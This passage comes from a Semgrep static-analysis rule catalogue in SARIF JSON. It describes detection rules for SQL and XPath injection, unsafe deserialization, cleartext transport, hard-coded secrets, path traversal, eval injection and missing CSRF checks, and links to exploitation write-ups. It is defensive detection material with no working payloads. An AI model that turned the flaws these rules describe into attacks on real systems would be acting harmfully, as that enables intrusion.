Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request)\n - [https://openjdk.java.net/groups/net/httpclient/intro.html](https://openjdk.java.net/groups/net/httpclient/intro.html)\n","text":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","id":"problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","name":"problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.xpath.tainted-xpath.tainted-xpath)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"helpUri":"https://semgrep.dev/r/java.micronaut.xpath.tainted-xpath.tainted-xpath","id":"java.micronaut.xpath.tainted-xpath.tainted-xpath","name":"java.micronaut.xpath.tainted-xpath.tainted-xpath","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.xpath.tainted-xpath.tainted-xpath"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","id":"python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","name":"python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","id":"python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","name":"python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure"},"help":{"markdown":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.losformatter?view=netframework-4.8](https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.losformatter?view=netframework-4.8)\n","text":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","id":"csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","name":"csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unencrypted request over HTTP detected."},"help":{"markdown":"Unencrypted request over HTTP detected.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.security.react-insecure-request.react-insecure-request)\n - [https://www.npmjs.com/package/axios](https://www.npmjs.com/package/axios)\n","text":"Unencrypted request over HTTP detected."},"helpUri":"https://semgrep.dev/r/typescript.react.security.react-insecure-request.react-insecure-request","id":"typescript.react.security.react-insecure-request.react-insecure-request","name":"typescript.react.security.react-insecure-request.react-insecure-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.security.react-insecure-request.react-insecure-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"help":{"markdown":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli)\n - [https://www.npmjs.com/package/mysql2](https://www.npmjs.com/package/mysql2)\n - [https://www.npmjs.com/package/mysql](https://www.npmjs.com/package/mysql)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n","text":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","id":"javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","name":"javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-open.dangerous-open)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-open.dangerous-open","id":"ruby.lang.security.dangerous-open.dangerous-open","name":"ruby.lang.security.dangerous-open.dangerous-open","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-open.dangerous-open"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-pyyaml.tainted-pyyaml)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","id":"python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","name":"python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-pyyaml.tainted-pyyaml"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","id":"terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","name":"terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","id":"python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","name":"python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks."},"help":{"markdown":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","id":"java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","name":"java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\""},"help":{"markdown":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\"\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls)\n - [https://node-postgres.com/features/ssl](https://node-postgres.com/features/ssl)\n - [https://nodejs.org/api/tls.html#tls_class_tls_tlssocket](https://nodejs.org/api/tls.html#tls_class_tls_tlssocket)\n - [https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options](https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options)\n - [https://nodejs.org/api/tls.html#tls_tls_default_min_version](https://nodejs.org/api/tls.html#tls_tls_default_min_version)\n","text":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\""},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","id":"javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","name":"javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source."},"help":{"markdown":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/)\n","text":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","id":"terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","name":"terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","properties":{"precision":"very-high","tags":["CWE-778: Insufficient Logging","HIGH CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","id":"python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","name":"python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","id":"javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","name":"javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information."},"help":{"markdown":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.code.user-eval-format-string.user-eval-format-string)\n - [https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html)\n","text":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.code.user-eval-format-string.user-eval-format-string","id":"python.django.security.injection.code.user-eval-format-string.user-eval-format-string","name":"python.django.security.injection.code.user-eval-format-string.user-eval-format-string","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.code.user-eval-format-string.user-eval-format-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls."},"help":{"markdown":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery)\n - [https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery](https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery)\n - [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests)\n","text":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple 